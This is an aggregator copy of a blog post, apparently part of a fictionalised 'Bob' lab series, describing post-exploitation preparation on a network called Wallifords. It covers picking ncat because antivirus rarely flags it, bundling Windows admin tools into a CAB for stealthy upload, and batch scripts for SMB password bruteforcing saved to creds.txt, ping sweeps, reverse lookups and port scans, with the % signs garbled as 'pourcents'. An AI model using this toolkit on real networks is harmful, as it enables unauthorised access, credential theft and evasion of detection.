Menu > Articles de la revue de presse : - l'ensemble [tous | francophone] - par mots clé [tous] - par site [tous] - le tagwall [voir] - Top bi-hebdo de la revue de presse [Voir]

---

S'abonner au fil RSS global de la revue de presse

---

Présentation : Bobs back and he's been thinking about his new playground. He's realised that if he's not careful he'll attract attention and get into trouble. He needs to lay down some ground-rules and define some goals before he goes back on the Wallifords network. If he's going to get the maximum benefit from Wallifords as a training ground rather than a playground he needs to get serious and stop recklessly throwing exploits at any old box. Goal 1 To extract as much information about the Walliford Network as possible. Goal 2 To identify high value targets and gain access to those systems. Goal 3 To remain undetected. Goal 4 To generally have fun, learn his tools and practice his techniques. Pretty simple goals eh. Bob knows that to remain undetected he's going to have to use as many tools that are already on the compromised host as he can. He knows that he needs to use as many legitimate tools as possible and only upload those that won't be detected by AV. Bob needs to get his tools onto the compromised hosts but uploading them one by one is a pain in the arse. Then he remembers something he heard in a great presentation on post exploitation from Dean Der Beer about using Metacab. He takes a look at Metacab but decides against using it. He really likes the idea but he wants a different set of tools so he goes about making his own version of Metacab. Using the Makecab tool already in XP he creates a cab file containing the few additional tools he needs knowing he can upload and extract the files from the cab with native windows tools from straight from the command-line. The one tool he cannot do without is netcat but AV picks it up quite easily. Then he remembers that his Nmap directory has ncat, a new version of netcat with loads of additional features. Bob runs it through virustotal to see what gives. Perfect, only detected by one AV product out of 41. Now Bob knows that he can use this tool for file transfer, creating proxies and even backdoors. Many of the other tools he dicides to include in the cab file come from the Windows Resource Kit. This means that there is very little chance of them being detected by AV or looking like Potentially Unwanted Applications PUA on the host. Tools List cmd.exe dsadd.exe dsget.exe dsquery.exe edit.com ncat.exe net.exe ngrep.exe pmon.exe PortQry.exe reg.exe srvinfo.exe WinDump.exe As expected VirusTotal finds nothing wrong with his other tools, but then again why would it. So looking at his tools Bob has his ncat for backdoors and file transfer, he has a port scanner, pmon for keeping an eye on his hosts cpu and memory, tools for extracting anything out of Active Directory, packet sniffers, SrvInfo which is great for looking at details of servers. He also includes a couple of standard tools such as Net.exe and Cmd.exe which are there just encase they had been removed by the Sys Admin. Hopefully he's got everything he needs for a successful expedition into the Walliford Fries network. Bob also creates a few bat files that he can use for scanning and password checks. It's easier to create these now and include them in the cab than it is to write them on the fly. His first bat file is a simple bruteforce script that will use inbuilt windows functions to bruteforce shares. He'll supply a userlist names.txt and a common password list words.txt to the bat file. The password list will be common passwords and can be tweaked using the inbuilt DOS Edit tool when he's on the target, and the userlists will be generated from his enumeration tool dsquery . Before any bruteforcing is done Bob will be checking the password policies so he doesn't trip any account lockout thresholds. So if the account lockout policy triggers after 3 incorrect attempts in half an hour he'll just try 2 common passwords on all accounts. As they say, slow and steady wins the race. Set P target Enter Target To Perform BF on For f pourcentspourcentsi in names.txt do for f pourcentspourcentsj in words.txt do echo pourcentspourcentsi pourcentspourcentsj net use pourcentstargetpourcents pourcentspourcentsj u pourcentspourcentsi 2nul echo pourcentspourcentsi pourcentspourcentsj . creds.txt net use pourcentstargetpourcents del Bob will use the either net.exe or dsquery.exe to populate his names.txt file. Dsquery is fantastic for ripping through Active Directory and if you know what your doing you can use them to pretty much find out anything about users and computers. The beauty is, these tools can be run from any user account, so you don't need to pop an admins box to get some juicy info. The next bat file that bob will include is to check for hosts that respond to a ping and output the results to a file. set P subnet Enter subnet for L pourcentspourcentsi in 1,1,255 do ping -n 1 -w 1 pourcentssubnetpourcents.pourcentspourcentsi find Reply Another bat file is created to perform reverse lookups using a nslookup FOR loop. set P subnet Enter subnet For L pourcentspourcentsi in 1,1,255 do nslookup pourcentssubnetpourcents.pourcentspourcentsi 2nul find Name echo pourcentssubnetpourcents.pourcentspourcentsi And finally a bat file to use the Portqry tool for port scans against hosts in a host file hosts.txt . Again he can use dsquery or net.exe to populate the hosts file. For F pourcentspourcentsi in hosts.txt do PortQry.exe -n pourcentspourcentsi -o 21,22,23,25,80,139,445,3389,1433,1434 -p tcp Ok, that'll do for now. Bob builds his ddf file for his cab file and creates the cab. MakeCAB Directive File for bin .OPTION EXPLICIT Generate errors .Set MaxCabinetSize 0 .Set MaxDiskSize 0 .Set CabinetNameTemplate bin.cab .set DiskDirectoryTemplate CDROM .Set CompressionType MSZIP .Set UniqueFiles OFF .Set Cabinet on .Set DiskDirectory1 bin bf.bat cmd.exe dsadd.exe dsget.exe dsquery.exe edit.com hosts.txt names.txt ncat.exe net.exe ngrep.exe pingsweep.bat pmon.exe port-scan.bat PortQry.exe reg.exe rev-lookup.bat srvinfo.exe WinDump.exe words.txt EOF Now building the cab time, at bloody last makecab F bin.ddf Perfect, after building his cab file it comes in at less than 1MB, Bob honestly couldn't be happier. He'll have to use the windows built-in tool called Expand.exe to get his files out of the cab. expand F bin.cab . Right with that done Bob is ready to hop onto his target and put his tools to good use and start his network exploration.






Les derniers articles du site "Syn" :

- Systray Recognition System
- What Bob Did. What Alice Saw - Part 2
- What Bob Did. What Alice Saw - Part 1
- A Little Forensics Goes a Long Way
- iPhone Wardriving Just Got Better
- Part-time Superman
- The SynJunkie Lab - Part 2
- The SynJunkie Lab
- The Obligatory I'm Not Dead Post
- Bob The Backdoor Man - Part 2

---

S'abonner au fil RSS global de la revue de presse

---